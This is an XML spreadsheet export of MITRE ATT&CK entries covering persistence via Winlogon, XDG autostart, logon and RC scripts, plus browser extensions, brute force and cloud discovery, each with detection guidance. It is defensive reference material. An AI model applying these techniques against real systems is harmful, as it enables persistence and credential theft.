Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: XDG Autostart Entries</t>
  </si>
  <si>
    <t>Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; or &lt;code&gt;~/.config/autostart&lt;/code&gt; directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)
Within an XDG autostart entry file, the &lt;code&gt;Type&lt;/code&gt; key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The &lt;code&gt;Name&lt;/code&gt; key indicates an arbitrary name assigned by the creator and the &lt;code&gt;Exec&lt;/code&gt; key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)
Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>10 September 2019</t>
  </si>
  <si>
    <t>Malicious XDG autostart entries may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
Suspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>User, root</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Mac)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)
Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>10 January 2020</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Windows)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Network Logon Script</t>
  </si>
  <si>
    <t>Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/003</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: RC Scripts</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to &lt;code&gt;rc.local&lt;/code&gt;, &lt;code&gt;rc.common&lt;/code&gt;, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/004</t>
  </si>
  <si>
    <t>15 January 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected changes to RC scripts in the &lt;code&gt;/etc/&lt;/code&gt; directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.
Monitor for &lt;code&gt;/etc/rc.local&lt;/code&gt; file creation. Although types of RC scripts vary for each Unix-like distribution, several execute &lt;code&gt;/etc/rc.local&lt;/code&gt; if present. </t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Startup Items</t>
  </si>
  <si>
    <t>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>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
Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
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t>
  </si>
  <si>
    <t>Mike Kemmerer</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Adversaries may abuse Internet browser extensions to establish persistent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access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the &lt;code&gt;profiles&lt;/code&gt; tool to install malicious &lt;code&gt;.mobileconfig&lt;/code&gt; files. In macOS 11+, the use of the &lt;code&gt;profiles&lt;/code&gt; tool can no longer install configuration profiles, however &lt;code&gt;.mobileconfig&lt;/code&gt; files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control.(Citation: Chrome Extension C2 Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
On macOS, monitor the command line for usage of the profiles tool, such as &lt;code&gt;profiles install -type=configuration&lt;/code&gt;. Additionally, all installed extensions maintain a &lt;code&gt;plist&lt;/code&gt; file in the &lt;code&gt;/Library/Managed Preferences/username/&lt;/code&gt; directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Chris Ross @xorrior; Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Ed Williams, Trustwave, SpiderLabs; Magno Logan, @magnologan, Trend Micro; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>Brute Force: Credential Stuffing</t>
  </si>
  <si>
    <t>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
Typically, management services over commonly used ports are used when stuffing credentials.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/004</t>
  </si>
  <si>
    <t>11 February 2020</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>Anastasios Pingios; Diogo Fernandes</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Brute Force: Password Cracking</t>
  </si>
  <si>
    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>16 September 2020</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Azure AD, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Brute Force: Password Guessing</t>
  </si>
  <si>
    <t>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Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Brute Force: Password Spraying</t>
  </si>
  <si>
    <t>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
* Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
* All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</t>
  </si>
  <si>
    <t>John Strand; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote &lt;code&gt;build&lt;/code&gt; request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that &lt;code&gt;build&lt;/code&gt; API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.</t>
  </si>
  <si>
    <t>Containers</t>
  </si>
  <si>
    <t>Image: Image Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security; Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security; Roi Kol, @roykol1, Team Nautilus Aqua Security; Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>23 April 2020</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>IaaS</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration, Cloud Storage: Cloud Storage Metadata, Instance: Instance Enumeration, Instance: Instance Metadata, Snapshot: Snapshot Enumeration, Snapshot: Snapshot Metadata, Volume: Volume Enumeration, Volume: Volume Metadata</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</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</si>
  <si>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ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>30 August 2019</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</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</si>
  <si>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Azure AD, etc. 
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1526</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Cloud Service: Cloud Service Metadata</t>
  </si>
  <si>
    <t>Praetorian; Suzy Schapperle - Microsoft Azure Red Team</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</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</si>
  <si>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Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
If scripting is restricted for normal users, then any attempt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</si>
  <si>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Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: AppleScript</t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>09 March 2020</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.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[Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Understanding standard usage patterns is important to avoid a high number of false positives.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t>
  </si>
  <si>
    <t>Phil Stokes, SentinelOne</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: JavaScript</t>
  </si>
  <si>
    <t>Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility &lt;code&gt;osascript&lt;/code&gt;, they can be compiled into applications or script files via &lt;code&gt;osacompile&lt;/code&gt;, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
